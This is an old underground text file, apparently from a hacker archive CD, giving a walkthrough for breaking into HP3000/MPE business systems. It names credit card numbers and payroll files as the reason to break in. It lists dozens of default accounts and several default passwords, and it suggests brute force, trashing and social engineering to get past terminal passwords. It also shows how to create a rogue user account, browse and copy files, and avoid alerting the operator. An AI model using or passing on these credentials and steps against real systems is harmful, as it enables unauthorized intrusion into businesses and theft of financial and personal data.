home *** CD-ROM | disk | FTP | other *** search
/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / hacking / general / 9x_hp3.txt < prev    next >
Encoding:
Text File  |  2003-06-11  |  17.6 KB  |  545 lines
  1. STATION ID - 7047/3.12
  2.  
  3. 9x Datakit Network
  4. FOR OFFICIAL USE ONLY
  5.  
  6. This is a 9x system, restricted to authorized persons and for
  7. official 9x business only. Anyone using this system, network or data
  8. is subject to being monitored at any time for system administration and
  9. for identifying unauthorized users or system misuse. Anyone using this
  10. system expressly consents to such monitoring and is advised that any
  11. evidence of criminal activity revealed through such monitoring may be
  12. provided to law enforcement for prosecution.
  13.  
  14.               Author : OneThought
  15.               Subject: Hacking the HP3000/MPE Platform
  16.  
  17.                  
  18.   There have been several write ups written in the past about the
  19. MPE operating system and how to hack it. To me many of these are
  20. out of date with the times or havent gone into certin aspects of
  21. the MPE-iX OS. To start this off i am going to shatter the myth 
  22. right now that the MPE is a out of date operating system and is 
  23. "not worth hacking" a phrase i have heard more then once now a 
  24. days. The HP3000/MPE OS is still ideal for a small work place of
  25. 10-15 terminals, several of these servers networked together creates 
  26. a powerful accounting and work system , Infact the MPE OSes latest 
  27. version was released in 1995 (MPE-iX 5.0) and is already being picked
  28. up by several companies. Right now you are asking yourself "Why should
  29. i hack a HP3000?". Besides being a fun system to navigate around, in 
  30. many cases HP3000s have some very good information inside of them. 
  31. Credit Card #s, Employees personal information, Payroll files are 
  32. all kept on HP3000s.
  33.  
  34.                      #Finding a HP3000.#
  35.  
  36.  When it comes down to finding a HP3000 your options are limited.
  37. Your best luck will definetly be scanning business exchanges, However
  38. you may also find a few inside the network information system of some
  39. unix boxes on the net. You will know when you have found one by the
  40. MPE XL: Prompt on older MPEs,MPE/iX, or MPE/V. If you are unsure of 
  41. one being a HP3000 simply type some random letters at the prompt and 
  42. press enter. If it is truely a HP3000 you will get the message 
  43. "EXPECTED HELLO COMMAND".
  44.  
  45.                       #Getting inside.#
  46.  
  47.  If you are attempting to hack a unsecured HP3000 then factory 
  48. defauts will suffice most of the time. The following is a list
  49. of default accounts and some password protected accounts. 
  50.  
  51. ADVMAIL.HPOFFICE
  52. MGR.HPDESK
  53. MGR.ROBLLE
  54. MGR.VESOFT
  55. MGR.WORD
  56. MGR.INTX3
  57. MGR.CAROLIAN
  58. MGR.XLSERVER
  59. MGR.CONV
  60. MGR.HPP187
  61. MGR.HPP189
  62. MGR.HPP189
  63. MGR.HPP196
  64. MGR.HPOFFICE
  65. MGR.CCC
  66. MGR.RJE
  67. MGR.SYS             Acct password: LOTUS
  68. MGR.ITF3000
  69. MGR.SECURITY
  70. MGR.HPWORD
  71. MGR.TELESUP         Acct password: HPONLY  User Password: MGR  
  72. MGR.COGNOS
  73. MGR.HPONLY
  74. MGR.NETBASE
  75. MGR.CNAS
  76. MGR.REGO
  77. MAIL.NETBASE
  78. MAIL.MAIL
  79. MAIL.TELESUP
  80. MAIL.HPOFFICE
  81. MAILMAN.HPOFFICE
  82. OPERATOR.SUPPORT
  83. OPERATOR.SYS
  84. OPERATOR.COGNOS
  85. OPERATOR.SYSTEM
  86. OPERATOR.DISC
  87. FIELD.HP
  88. FIELD.HPUNSUP
  89. FIELD.HPWORD
  90. FIELD.SERVICE       Acct password: HPWORD 
  91. FIELD.SUPPORT,PUB
  92. FIELD.HPP187
  93. MANAGER.SYS
  94. MANAGER.COGNOS
  95. MANAGER.HPOFFICE
  96. MANAGER.ITF3000
  97. MANAGER.SECURITY
  98. MANAGER.TCH
  99. SYS.TELESP
  100. WP.HPOFFICE
  101. SPOOLMAN.HPOFFICE
  102. RSBCMON.SYS
  103. PCUSER.SYS
  104.  
  105. Use the following default accounts listed above to login as
  106. souch. 
  107.  
  108.         :HELLO MGR.SYS,PUB
  109.                    
  110.            
  111.    Login Command: HELLO    
  112.    Username     : MGR
  113.    Account name : SYS
  114.    Group Name   : PUB
  115.  
  116.  When trying account and user names sometimes you will get the 
  117. message "ACCOUNT EXISTS, USERNAME DOES NOT". This means that you
  118. have enterd a valid account but not a valid user name. The same
  119. goes for "ACCOUNT/USERNAME EXIST BUT NOT IN HOME GROUP". Here
  120. you must include a valid group name with the login account name
  121. and user name.   
  122.  
  123. *Note The group name is not required to be typed at the login prompt
  124. most of the time.
  125.  
  126.  
  127.   #Barriers that will stand in the way of gaining access to a HP3000.#
  128.  
  129.  Terminal password. Sometimes you will log in on a default account
  130. and then recieve the prompt
  131.  
  132. TERMINAL PASSWORD:
  133.  
  134.  The terminal password is a eight bit alpha password that is not
  135. a normal feature of HP3000s, But some system administrators request
  136. it being on a new system. The only way to get by this is a brute
  137. force attack, or going out and doing some field work i.e trashing
  138. at the companys location,social engineering, etc etc.
  139.  
  140.  Another problem you may run across is a terminal that will not
  141. accept logins from certin accounts. When running into this you will
  142. need to find another account that can login on that terminal.
  143.  
  144. Case in point:
  145.  
  146. CONNECT 9600/ARQ/V32/LAPM/V42BIS
  147. MPE XL:HELLO OPERATOR.SYS
  148. HP3000  RELEASE: B.40.00   USER VERSION: B.40.00
  149. FRI, JUN 28, 1996,  6:11 PM
  150. MPE/iX  HP31900 B.30.45  Copyright Hewlett-Packard 1987.  
  151. All Rights Reserved.
  152.  
  153. YOU ARE AT A TERMINAL THAT
  154. YOU ARE NOT ALLOWED TO USE
  155.  SO NOW I LOG YOU OFF.
  156.  
  157. END OF PROGRAM
  158. CPU=1. CONNECT=1. FRI, JUN 28, 1996,  6:11 PM.
  159.  
  160. NO CARRIER
  161.  
  162. Something else you may run into is closed sessions. This means that
  163. at that time the system cannot create a new session for a number of 
  164. reasons, Maximum of users are already signed on or logins are not allowed
  165. at that time. The best thing to do when running into that is to try again 
  166. every few hours till you are allowed to start a new session.
  167.  
  168. Case in point:
  169.  
  170. CONNECT 9600/ARQ/V32/LAPM/V42BIS
  171. MPE XL: HELLO MGR.RJE
  172.  
  173. CAN'T START A NEW SESSION (CIERR 970)
  174.  
  175. NO CARRIER
  176.  
  177.  The last thing i will cover when it comes to barriers on HP3000s
  178. is the VESOFT add on. I will not go into this in depth but just give 
  179. you a rough over view. First off to identify a system running VESOFT
  180. you will have MPE/V: as your prompt. There will be no default accounts
  181. on this system, if you get in by other means it will be extremly 
  182. restrictive and secure. Your best hope here is to give up.
  183.  
  184. The first thing that you will want to do once inside is find out what 
  185. access (if any) that you have. This is done by doing a LISTACCT.
  186.  
  187. Case in point:
  188.  
  189. :LISTACCT 
  190. ********************
  191. ACCOUNT: <What ever acct you are>
  192.  
  193. DISC SPACE: 0(SECTORS)          PASSWORD: **
  194. CPU TIME  : 2(SECONDS)          LOC ATTR: $00000000
  195. CONNECT TIME: 2(MINUTES)        SECURITY--READ    : ANY
  196. DISC LIMIT: UNLIMITED                     WRITE   : ANY
  197. CPU LIMIT : UNLIMITED                     APPEND  : ANY
  198. CONNECT LIMIT: UNLIMITED                  LOCK    : ANY
  199. MAX PRI  : 150                            EXECUTE : ANY
  200. GRP UFID : $055E0002 $0AC53AD3 $0055A7BE $2C052855 $04A775F1
  201. USER UFID: $00000000 $00000000 $00000000 $00000000 $00000000
  202. CAP: AM,ND,SF,BA,IA
  203.  
  204. Most of this is self explanitory. The imprtant part to look at
  205. is the CAP: section. Here is the capeability list needed to understand
  206. what access you have.
  207.  
  208. Abrev.     Capeability.
  209.  
  210. SM         System Manager
  211. AM         Account Manager
  212. AL         Account Librarian  
  213. GL         Group Librarian
  214. DI         Diagnostician
  215. OP         System Supervisor
  216. NA         Network Administrator
  217. NM         Node Manager
  218. SF         Permanent Files 
  219. ND         Access to nonsharable I/O devices  
  220. UV         Use Volumes
  221. CV         Create Volumes 
  222. CS         Use Communications Subsystem
  223. PS         Programmatic Sessions
  224. LG         User Logging
  225. PH         Process Handling
  226. DS         Extra Data Segments
  227. MR         Multiple RINs
  228. PM         Privilaged mode
  229. IA         Interactive Access
  230. BA         Local Batch Access
  231.  
  232. Now compare the chart i have just included with what ever
  233. account you have. This will dictate what privilaged commands
  234. you may be able to execute as i will describe later in this file.
  235.  
  236.                  #Making yourself an account#
  237.  
  238.   Making yourself an account requires SM or AM access. On some ocasions
  239. you will not be able to make an account with AM access if the System 
  240. Manager has modified your account. You will be able to give your new
  241. account equal access as the one you are on when making it.  
  242.  
  243. Case in point:
  244.  
  245. :NEWUSER   <User id> <Group Id> <Password>
  246.  
  247.       The same can also be said for the following commands..
  248.  
  249. :NEWGROUP  <Group ID>     *Creates a new group, very noticeable
  250.  
  251. :PURGEUSER <User ID>      *Delites a user   
  252.  
  253. :PURGEGROUP <Group ID>    *Delites a group. 
  254.  
  255.                      #Time to look around.#
  256.  
  257. You now have hopefully created a new account and know what access
  258. you have. Now it is time to check the system out. First you will need
  259. to know how to use the help file, as HPs may differ from version
  260. to version. Type HELP <item you need help with> and it will bring
  261. up other words to look at or a section of the help file. Do NOT type
  262. HELP as the entire MPE manuel will be scrolled on the screen, Taking 
  263. aproximetly 18 minutes to be fully scrolled. 
  264.  
  265.   To find out how big this system is and what devices are available
  266. type..
  267.  
  268. :SHOWDEV
  269.  LDEV     AVAIL         OWNERSHIP         VOLID         DEN   ASSOCIATION
  270.  
  271.     1     DISC          N/A
  272.     2     DISC          N/A
  273.     3     DISC          N/A
  274.     4     DISC          N/A
  275.     5     AVAIL
  276.     6     SPOOLED       SPOOLER OUT
  277.     7     AVAIL
  278.     8     AVAIL
  279.     9     AVAIL
  280.    10   A AVAIL
  281.    11     AVAIL
  282.    12     AVAIL
  283.    13     AVAIL
  284.    14     AVAIL
  285.    15     AVAIL
  286.    16     AVAIL
  287.    17     AVAIL
  288.    18     AVAIL
  289.    19     AVAIL
  290.    20   A UNAVAIL       #S8886: 8 FILES
  291.    21   A AVAIL
  292.    33     SPOOLED       SPOOLER OUT
  293.    40     SPOOLED       SPOOLER OUT
  294.   103   J AVAIL
  295.   104   J AVAIL
  296.   105   J AVAIL
  297.   106   J AVAIL
  298.   107   J AVAIL
  299.   108   J AVAIL
  300.   109   J AVAIL
  301.   110   J AVAIL
  302.   111   J AVAIL
  303.   112   J AVAIL
  304.   113   J AVAIL
  305.   114   J AVAIL
  306.   115   J AVAIL
  307.   116   J UNAVAIL       #S10041: 8 FILES
  308.   117   J AVAIL
  309.  
  310. This will give you a reference for downloading which i will cover 
  311. later.
  312.  
  313.             #Navigating commands around groups and files#
  314.  
  315.   LISTF @       Lists every file in your current group
  316.  
  317. Case in point:
  318.  
  319. :LISTF @
  320.  
  321. FILENAME
  322.  
  323. ABORTEST    ACCTJOBS    AIFKUF      ALOCATEJ    ANSTART     ANSTAT
  324. ANSTOP      ANUTIL      ASOCTBL     ATCUT000    ATCUTIL     AUTOHIST
  325. BACKUP      BDLABEL     BDLT        BDMO        BDREPORT    BDXM
  326. BRW         BRWACCSD    BRWAPPD     BRWC000     BRWCOMP     BRWCONV
  327. BRWD3000    BRWDL000    BRWDLIST    BRWDUSER    BRWEMPTY    BRWEXEC
  328. BRWEXECO    BRWF000     BRWGEND     BRWJ000     BRWL000     BRWLIST
  329. BRWM000     BRWSD       BRWSDEXT    BRWSETUP    BRWSTART    BRWSTOA
  330. BRWSTRM     BRWXL       BUILDINT    BULDACCT    CATALOG     CATTUTIL
  331. CCMSGCAT    CDCAT       CDMGR       CDMGRSKT    CDSERVER    CDSRVSKT
  332. CDSTARTJ    CDSTOPJ     CEUDCS      CHRDEF01    CHRDEF02    CHRDEF03
  333. CHRDEF04    CHRDEF06    CHRDEF51    CHRDEF56    CHRDEF61    CHRDEF66
  334. CI          CICAT       CICATERR    CKINST      CLS1        CMSTORE
  335. COB74XL     COB74XLG    COB74XLK    COB85XL     COB85XLG    COB85XLK
  336. COBCAT      COBCNTL     COBEDIT     COBMAC      COBOL       COBOL85
  337. COBOLII     COBUDC      COMMA
  338.  
  339.  LISTF @.@     Lists all the files in every group on your account.
  340.  
  341.   LISTF @.@.@   Lists ALL files in every group on the system
  342.   *If you are in a rush for time dont use the above command.
  343.  
  344.   LISTF @.<Group ID>.<Acct ID>, -1 Lists a specific users files. 
  345.   
  346.   LISTF @.@.@,2 Lists all files on system with group and account name.
  347.  
  348.   DSCOPY <fname>.<group id>.<acct id> to <fname>.<group id>.<acct id>
  349.   ^ Copies files from one account to another.
  350.    
  351.   PURGE <fname>.<group id>.<acct id>  Delites a file.
  352.  
  353.   RENAME <old file>.<group>.<Acct>,<New file>.<Group>.<acct>
  354.   ^ Renames a file.
  355.   
  356.   RUN <File name>.<Group ID>.<Acct ID>   Runs a file.   
  357.   
  358.  EDITOR <Filename> 
  359.  
  360.  Case in point:
  361.  
  362. :EDITOR <Whatever file here>
  363. HP32201A.09.00 EDIT/3000 FRI, JUL  5, 1996,  5:01 AM
  364. (C) HEWLETT-PACKARD CO. 1993
  365. /
  366. /END
  367. :
  368.  
  369.   Just type "END" to leave the editor.
  370.  
  371.  To download use :DOWNLOAD <device>,<file>
  372. *Refer back to SHOWDEV to figure out which device to use on the system.
  373.  
  374.               #Other useful and not so useful commands#
  375.  
  376. SHOWCATALOG  =  This command will show commands unique to that system.
  377.  
  378. Case in point:
  379.  
  380. :SHOWCATALOG
  381. SYSUDC5.UDC.SYS
  382.    SPENTRY           SYSTEM
  383.    EDIT              SYSTEM
  384.    COBOLII           SYSTEM
  385.    ED                SYSTEM
  386.    KSAM              SYSTEM
  387.    COBEDIT           SYSTEM
  388.    SJ                SYSTEM
  389.    FORMSPEC          SYSTEM
  390.    ENTRY             SYSTEM
  391.    SO                SYSTEM
  392.    SM                SYSTEM
  393.    FREE5             SYSTEM
  394.    SH                SYSTEM
  395.    L                 SYSTEM
  396.    QUAD              SYSTEM
  397.    MPEX              SYSTEM
  398.    MPEXLOGON         SYSTEM
  399.    QEDITOR           SYSTEM
  400.    GOD               SYSTEM
  401.    JOBMASTER         SYSTEM
  402.    SJ                SYSTEM
  403.    SJJ               SYSTEM
  404.    SJS               SYSTEM
  405.    QUIZ              SYSTEM
  406.    QUIZR             SYSTEM
  407.    CONVRPO           SYSTEM
  408.    QUICK             SYSTEM
  409.    COGHELP           SYSTEM
  410.    PHINIT12          SYSTEM
  411.    PHSRVN            SYSTEM
  412.    PHSRVS12          SYSTEM
  413.  PHSRVS            SYSTEM
  414.    CVRPO12E          SYSTEM
  415.    SETPOWERHOUSE     SYSTEM
  416.    RESETPOWERHOUSE   SYSTEM
  417.    PHRUNPROG         SYSTEM
  418.    PHRUNINTERBASE    SYSTEM
  419.    GBAK              SYSTEM
  420.    GCSU              SYSTEM
  421.    GDEF              SYSTEM
  422.    GDSCSERVER        SYSTEM
  423.    GDSRSERVER        SYSTEM
  424.    GDSLOCKPRINT      SYSTEM
  425.    GDSRELAY          SYSTEM
  426.    GFIX              SYSTEM
  427.    GLTJ              SYSTEM
  428.    GPRE              SYSTEM
  429.    GRST              SYSTEM
  430.    GSEC              SYSTEM
  431.    GSTAT             SYSTEM
  432.    ISCINSTALL        SYSTEM
  433.    QLI               SYSTEM
  434.    SETINTERBASE      SYSTEM
  435.    RESETINTERBASE    SYSTEM
  436.    PLISTF            SYSTEM
  437.    FINDDIR           SYSTEM
  438.    FINDFILE          SYSTEM
  439.    LISTDIR           SYSTEM
  440.    DISCUSE           SYSTEM
  441.    SH                SYSTEM
  442.    HPMPETOHFS        SYSTEM
  443.    HPLISTFCLEANUP    SYSTEM
  444.    HPPARSEFEQ        SYSTEM
  445.  
  446.   REPORT   =  Lists CPU allocation, disk allocation, disk volume, and
  447. connect time for your group.
  448.  
  449. Case in point:
  450.  
  451. :REPORT
  452.  
  453. ACCOUNT       FILESPACE-SECTORS     CPU-SECONDS    CONNECT-MINUTES
  454.    /GROUP       COUNT    LIMIT    COUNT    LIMIT    COUNT    LIMIT
  455. RJE                 0       **        2       **        2       **
  456.    /PUB             0       **        2       **        2       **
  457.  
  458.  SHOWJOB  =  Lists all users and their group information along
  459. with their session number and the availability to accept messages in
  460. the form of QUIET for not being able to accept messages.
  461.  
  462. Case in point:
  463.  
  464. :SHOWJOB
  465.  
  466. JOBNUM  STATE IPRI JIN  JLIST    INTRODUCED  JOB NAME
  467.  
  468. #J11627 EXEC        10S LP       FRI  1:11A  GLPOSTJ,MGR.HPFAS
  469. #J11625 EXEC        10S LP       FRI  1:11A  ARPOSTJ,MGR.HPFAS
  470. #S9651  EXEC       302  302      FRI  1:19A  LDEV220,PRINT.SPI
  471. #S9650  EXEC       221  221      FRI  1:18A  LDEV221,FORM1.SPI
  472. #J11626 EXEC        10S LP       FRI  1:11A  APPOSTJ,MGR.HPFAS
  473. #S9725  EXEC       116  16      FRI  9:30P  MGR.RJE
  474. #S8886  EXEC        20  20       FRI 10:20A  CONSOLE,OPERATOR.SYS
  475. #J11628 EXEC        10S LP       FRI  1:11A  MAXSTART,MGR.HPFAS
  476. #S9652  EXEC       117  117      FRI  1:45A  SPIM1.SPI
  477. #S9656  EXEC       213  213      FRI  6:59A  MIS,MGR.HPFAS
  478. #S9701  EXEC       202  202      FRI 12:53P  PRINT1.SPI
  479. #S9721  EXEC       214  214      FRI  4:56P  MSPENCE.SPI
  480. #S923  EXEC       211  211      FRI  7:39P  SUPV.SPI
  481.  
  482. 13 JOBS:
  483.     0 INTRO
  484.     0 WAIT; INCL 0 DEFERRED
  485.    13 EXEC; INCL 9 SESSIONS
  486.     0 SUSP
  487. JOBFENCE= 7; JLIMIT= 8; SLIMIT= 30
  488.  
  489.  
  490. CURRENT:  6/28/96 21:44
  491.  
  492. JOBNUM  STATE IPRI JIN  JLIST    SCHEDULED-INTRO   JOB NAME
  493.  
  494. #J11607 SCHED    8  10S LP        6/28/96 22:15    FOBACKUP,MGR.SPI
  495. #J11602 SCHED    8  10S LP        6/28/96 23:27    PSI0560J,MGR.SPI
  496. #J11603 SCHED    8  10S LP        6/28/96 23:30    CPMNT2AJ,MGR.SPI
  497. #J11605 SCHED    8  10S LP        6/28/96 23:35    PSI0560J,MGR.SPI
  498. #J11608 SCHED    8  10S LP        6/29/96  0:30    SPIOFF,MGR.SPI
  499. #J11639 SCHED    8  10S LP        6/29/96  5:00    PSI0890,MGR.SPI
  500. #J11642 SCHED    8  10S LP        6/29/96  7:00    SLHCHCKJ,MGR.SPI
  501. #J11866 SCHED    8  10S LP        6/29/96 16:00    UOMCHCKJ,MGR.SPI
  502. #J10694 SCHED    8  10S LP        6/29/96 17:00    CAPCHCKJ,MGR.SPI
  503. #J11885 SCHED    8  10S LP        6/29/96 18:00    NEWPRCEJ,MGR.SPI
  504. #J11886 SCHED    8  10S LP        6/29/96 19:30    ORDERSJ,MGR.SPI
  505. #J11636 SCHED    1  10S LP        6/30/96  4:00    VENDLIST,MGR.HPFAS
  506. #J11892 SCHED    1  10S LP        6/30/96  4:00    VENDLIST,MGR.HPFAS
  507. #J10720 SCHED    8  10S LP        7/ 1/96  0:00    WEEKINV,MGR.SPI
  508. #J6568  SCHED    8  10S LP        7/ 1/96  6:30    DOWNTBJ,MGR.SPI
  509. #J11884 SCHED    1  10S LP        7/ 1/96 17:15    BPOSTAR,MGR.HPFAS
  510. #J11889 SCHED    1  10S LP        7/ 1/96 20:00    BPOSTAP,MGR.HPFAS
  511. #J11890 SCHED    1  10S LP        7/ 1/96 20:10    BPOSTGL,MGR.HPFAS
  512. #J11891 SCHED    1  10S LP        7/ 5/96 20:15    AUDITRPJ,MGR.HPFAS
  513.  
  514. 19 SCHEDULED JOB(S)
  515.  
  516.    Commands that you wont want to use..
  517.  
  518. SHOWTIME                  Shows the current time.
  519.  
  520. TELLOP <message>          Messages Operator.
  521.  
  522. SETMSG ON/OFF             Sets your availability to recieve messages.
  523.  
  524. TELL <Job>,<User>.<acct>; Message  Sends a message to someone signed on.
  525.  
  526.                          #Logging off#  
  527.  To log off just type BYE or EXIT at the prompt. You will then recieve
  528. this logoff message..
  529.  
  530. :BYE
  531.  
  532. CPU=43. Connect=33. SAT, JUN 29, 1996, 1:03 AM.
  533.  
  534. NO CARRIER
  535.  
  536.                        #Conclusion#
  537.  
  538.  I hope this file will spawn possible intrest once again in HP3000s
  539. and the MPE Platform. HP will continue to support the MPE platform
  540. for a very long time and with the extensive business software and
  541. porting of unix to MPE systems you should expect to see these systems
  542. for a few more decades. Greets to Black IC for his VESOFT write up 
  543. and to The Underground Consortium for their Hewlet Packard support.
  544.  
  545.